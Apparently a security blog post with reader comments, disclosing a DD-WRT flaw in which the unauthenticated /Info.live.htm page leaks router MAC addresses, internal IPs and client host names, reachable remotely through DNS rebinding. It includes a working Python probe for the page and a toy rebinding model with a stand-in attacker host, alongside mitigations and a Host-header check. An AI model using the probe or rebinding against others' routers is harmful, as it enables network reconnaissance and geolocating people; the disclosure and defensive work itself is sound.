DD-WRT, I Know Where You Live

I’ve always envied CSI’s amazing IP address geolocation capabilities. Not only can they get your exact physical address based solely off your IP (right down to your hotel room number!), it even works on IP addresses that don’t exist!

While that level of IP address tracking is beyond the grasp of us mere mortals, MAC address geolocation provided by Google Location Services and Skyhook is pretty close. Just feed them the MAC address of your wireless router and they will tell you, with scary precision, where you are.

But what if you wanted to find the wireless MAC address of someone else’s router – remotely? Thanks to an information disclosure vulnerability in DD-WRT, you can.

If you are running DD-WRT and have the ‘info page’ setting at either ‘enabled’ (the default) or ‘disabled’ (that is, anything other than ‘Info Site Password Protection’), an unauthenticated remote attacker can get your:

  • Router’s LAN/WAN/WLAN MAC addresses
  • Router’s internal IP address
  • Internal client’s IP addresses and host names

All they have to do is make a GET request for the ‘/Info.live.htm’ page. No credentials are needed, and setting the info page to ‘disabled’ only hides the status page itself; the Info.live.htm page that feeds it stays reachable.
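To see what that request hands back, here is an added example, not code from the original post or from the DD-WRT project: a small Python probe that fetches /Info.live.htm with no credentials and pulls the router MACs, LAN IP and client list out of the response. The `{key::value}` line format, the field names (`lan_mac`, `wan_mac`, `wl_mac`, `lan_ip`, `arp_table`) and the four-column `arp_table` layout are assumptions taken from DD-WRT's .live.htm status pages and should be checked against your own build; the embedded response is constructed sample data, not a capture.

```python
"""Probe a DD-WRT router for the unauthenticated /Info.live.htm page and pull
the disclosed fields out of it. Field names, the {key::value} line format and
the arp_table layout are assumed from DD-WRT's .live.htm status pages."""
import re
import sys
import urllib.request
from urllib.error import HTTPError, URLError

LIVE_FIELD_RE = re.compile(r"\{(\w+)::(.*?)\}", re.S)
MAC_RE = re.compile(r"^(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")

# Constructed sample response (not captured from a real router).
SAMPLE_INFO_LIVE = (
    "{lan_mac::00:1A:2B:3C:4D:5E}\n"
    "{wan_mac::00:1A:2B:3C:4D:5F}\n"
    "{wl_mac::00:1A:2B:3C:4D:60}\n"
    "{lan_ip::192.168.1.1}\n"
    "{wan_ipaddr::203.0.113.17}\n"
    "{arp_table::'desktop','192.168.1.100','00:11:22:33:44:55','1',"
    "'laptop','192.168.1.101','00:11:22:33:44:66','3'}\n"
)


def parse_live_page(body):
    """Map every {key::value} entry in a *.live.htm body to a dict."""
    return dict(LIVE_FIELD_RE.findall(body))


def parse_arp_table(value):
    """arp_table is a flat list of quoted strings in groups of four:
    hostname, IP, MAC, connection count (layout assumed). Trailing
    incomplete groups are dropped."""
    tokens = re.findall(r"'([^']*)'", value)
    usable = len(tokens) - len(tokens) % 4
    return [
        {"hostname": tokens[i], "ip": tokens[i + 1], "mac": tokens[i + 2]}
        for i in range(0, usable, 4)
    ]


def summarize_disclosure(body):
    """Collect exactly what the post says leaks: router MACs, LAN IP,
    and the internal clients' IPs and host names."""
    fields = parse_live_page(body)
    macs = {
        name: fields[name]
        for name in ("lan_mac", "wan_mac", "wl_mac")
        if MAC_RE.match(fields.get(name, ""))
    }
    return {
        "router_macs": macs,
        "lan_ip": fields.get("lan_ip"),
        "clients": parse_arp_table(fields.get("arp_table", "")),
    }


def fetch_info_live(router, timeout=5.0):
    """Plain unauthenticated GET; returns the body, or None on any failure
    (a 401 here means Info Site Password Protection is on)."""
    url = "http://%s/Info.live.htm" % router
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except (HTTPError, URLError, OSError):
        return None


def is_exposed(body):
    """True when the response discloses at least one router MAC address."""
    return bool(body) and bool(summarize_disclosure(body)["router_macs"])


if __name__ == "__main__":
    # Usage: python probe.py 192.168.1.1   (no argument: parse the sample)
    body = fetch_info_live(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_INFO_LIVE
    if not is_exposed(body):
        print("Info.live.htm not readable or carries no MAC addresses")
    else:
        info = summarize_disclosure(body)
        for name, mac in sorted(info["router_macs"].items()):
            print("%-8s %s" % (name, mac))
        print("lan_ip   %s" % info["lan_ip"])
        for c in info["clients"]:
            print("client   %-16s %-16s %s" % (c["hostname"], c["ip"], c["mac"]))
```

Run it against your own router's LAN address from inside the network; if it prints the MACs, the page is readable without a password, and the wireless one (`wl_mac`) is the value a geolocation service wants.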

Now, I know what you’re thinking: “Surely this only affects DD-WRT routers that have remote administration enabled!” No, it doesn’t. And don’t call me Shirley.

This is exploitable even with remote administration disabled because DD-WRT is also vulnerable to a public IP DNS rebinding attack. The attacker’s host name first resolves to the attacker’s own server and is then re-pointed at the victim router’s public IP, so when a user inside your network browses to that site, its script can proxy requests through the user’s browser to the router’s Web interface and pull this information out – no authentication or remote administration required. And, thanks to Rebind, pulling off this type of rebinding attack is pretty simple.
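The rebinding step, as an added illustration that is neither the post’s nor Rebind’s code: a toy resolver that answers the attacker’s domain first with the attacker’s server and then with the router’s public IP, the request the victim’s browser sends after the switch (it still carries the attacker’s host name in `Host:`), and a Host-header check that a LAN-side Web interface could use to refuse such requests. The addresses and the router host name are made up (RFC 5737 documentation ranges), and the Host check is a general anti-rebinding measure, not a description of what DD-WRT does.

```python
"""Toy model of a public-IP DNS rebinding attack against a router's LAN-side
Web interface, plus a Host-header check that refuses rebound requests."""
import ipaddress
from urllib.parse import urlsplit

# Constructed addresses (RFC 5737 documentation ranges), not real hosts.
ATTACKER_NAME = "attacker.example"
ATTACKER_IP = "198.51.100.7"     # attacker's web server
ROUTER_WAN_IP = "203.0.113.17"   # victim router's public IP
ROUTER_LAN_IP = "192.168.1.1"
ROUTER_NAMES = ("dd-wrt",)       # assumed LAN host name of the router


class RebindingResolver:
    """Stand-in for the attacker's DNS server: the first answer points the
    browser at the attacker's site (so the page loads), every later answer
    at the router's public IP."""

    def __init__(self, attacker_ip, target_ip):
        self.attacker_ip = attacker_ip
        self.target_ip = target_ip
        self.queries = 0

    def resolve(self, name):
        self.queries += 1
        return self.attacker_ip if self.queries == 1 else self.target_ip


def browser_request(resolver, name, path):
    """Return (connect_ip, raw_request) for a same-origin fetch by the
    victim's browser. After the rebind the TCP connection goes to the
    router, but the Host header still names the attacker's domain."""
    ip = resolver.resolve(name)
    request = "GET %s HTTP/1.1\r\nHost: %s\r\n\r\n" % (path, name)
    return ip, request


def host_header(raw_request):
    """Pull the Host header value out of a raw HTTP request (or None)."""
    for line in raw_request.split("\r\n")[1:]:
        if not line:
            break
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "host":
            return value.strip()
    return None


def is_rebinding_request(host_value, own_addresses, own_names=()):
    """True when Host: does not name this device by one of its own IPs or
    host names. A LAN client types the router's address into the browser,
    so a foreign name in Host: is the fingerprint of a rebound request."""
    if not host_value:
        return True
    try:
        parts = urlsplit("//" + host_value.strip())
        host, _port = parts.hostname, parts.port  # .port raises on junk
    except ValueError:
        return True
    if not host:
        return True
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return host.lower().rstrip(".") not in {n.lower() for n in own_names}
    return addr not in {ipaddress.ip_address(a) for a in own_addresses}


def run_demo():
    """Drive the attack and the check; returns (rebound_ip, rejected)."""
    dns = RebindingResolver(ATTACKER_IP, ROUTER_WAN_IP)
    browser_request(dns, ATTACKER_NAME, "/")          # initial page load
    ip, req = browser_request(dns, ATTACKER_NAME, "/Info.live.htm")
    own = (ROUTER_LAN_IP, ROUTER_WAN_IP)
    return ip, is_rebinding_request(host_header(req), own, ROUTER_NAMES)


if __name__ == "__main__":
    ip, rejected = run_demo()
    print("second request connects to %s; Host check rejects it: %s" % (ip, rejected))
```

The check only helps if the Web server applies it to every path, including the .live.htm pages; it does not replace a password on the Info site, and it does nothing against an attacker who already has a foothold on the LAN.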

You can read a more detailed write-up on the vulnerability here, or watch the video below demonstrating the use of Rebind and Google Location Services to obtain the location of a DD-WRT router.


33 Responses to DD-WRT, I Know Where You Live

  1. Pingback: Tweets that mention DD-WRT information disclosure vulnerability: -- Topsy.com

  2. jimbo says:

    Your recommended steps for mitigation – enable info site, require password – do not appear to work for v24-sp1 10011. Quite unfortunate.

  3. jimbo says:

    Urp – oops, never mind that previous comment; my password was cached. Ignore the idiot behind the curtain.

  4. Pingback: DD-WRT, I Know Where You Live « Laboratory B

  5. Pingback: “DD-WRT, I Know Where You Live” - #!/zitstif.no-ip.org/

  6. coldfront says:

    Can’t you just disable the httpd on the router? I always do that anyway; I just SSH in and manually start httpd if I need to change a setting. Saves RAM.

  7. DD-WRT v24-sp2 (08/07/10) std (SVN revision 14896) seems not to be vulnerable.

    • Craig says:

      Thomas, I’m running DD-WRT v24-sp2 build 14896 (08/07/10) std on a WRT-160N right now and this definitely works. Are you sure you haven’t set the page info to be password protected? That is the suggested mitigation for this issue (it still works if the info page is disabled though).

  8. Craig says:

    @coldfront:

    Yes, you can disable the httpd service and that will obviously fix any Web-based issues.

  9. Thanks for revealing this vulnerability in the DD-WRT firmware. Your mitigation steps worked great. Thanks again!

  10. Pingback: Simon Hughes Fredsted» Blog Archive » Fix: Securing the DD-WRT location vulnerability

  11. Pingback: DD-WRT, I Know Where You Live « irbnews

  12. What a post. Thanks a lot!

  13. Chris says:

    All of the information in the “vulnerability” is scraped from the Info site.

    There’s an option in the Administration pages for “Info Site Password Protection”. AFAIK, this closes the vulnerability.

  14. Craig says:

    Chris,

    Correct; as stated in the PDF, this does not affect the “Info Site Password Protection” setting.

    The issue is: if you have set Info Site to disabled in order to restrict this information, the Info.live.htm page can still be accessed which is certainly not the intended or desired behavior.

  15. I believe that if you port forward the corresponding web interface port(s) to somewhere, you are not vulnerable to the rebinding attack. This may also work well as a quick fix, just port forward the ports to somewhere using the web interface.

  16. Pingback: Vulnerability in DD-WRT allows near-exact geolocation of its users : Redes Zone : Portal on telecommunications and networks

  17. Craig: you are absolutely right, my bad.

  18. ismartypants says:

    Thanks for this interesting post. I will be sure to get the word out about this site 🙂 Excellent post. Can’t wait to see the next blog post.

  19. Pingback: Vulnerabilities in Tor, Evince, Subversion, libpng, Mono, Wireshark, Gimp, DD-WRT, VLC and Libxml2 | AllUNIX.ru – All-Russian portal on UNIX systems

  20. Pingback: Vulnerabilities in Tor, Evince, Subversion, libpng, Mono, Wireshark, Gimp, DD-WRT, VLC and Libxml2


  22. Pingback: DD-WRT, I Know Where You Live | Linux-backtrack.com

  23. Great write-up, but this wouldn’t really work with my router IP address. Any helpful hints?

  24. Pingback: DD-WRT Vulnerable

  25. Pingback: /dev/ttyS0 » Blog Archive » SHODAN Researches DD-WRT Vulnerability

  26. cb says:

    Thanks for posting this. I have verified that the following dd-WRT version does not have this vulnerability:

    DD-WRT v24-sp2 (07/22/09) mini – build 12548M NEWD Eko

    As you can see from the build date, it’s older than many. I went on and “enabled” Info Site Password Protection just to be safe.

    I was unable to access my dd-WRT enabled firewall/router from the http://samy.pl/mapxss/ or from a netbook that is internally on my LAN.

  27. Klaus says:

    Don’t understand how exactly I got in here, but I’m really glad I’ve found it. Hmmm… I’m starting to believe Google is beginning to read my mind 🙂 Nice work!


  29. Pingback: DD-WRT Security Vulnerability | vincentkong.com

  30. Claus says:

    Hello there…
    Can someone test a recent build of DD-WRT for the DNS rebind issue? I didn’t find any DNS rebind test website, and I don’t have a Web server out there available where I could install the package from the Google Dev site.
    I know I can enable the Password for the info-site, but the real threat in my opinion is the DNS-Rebind-Issue…
    Greetings from Austria

  31. Pingback: Installing dd-wrt on a Linksys WRT320N wireless router | Kirkian Computing

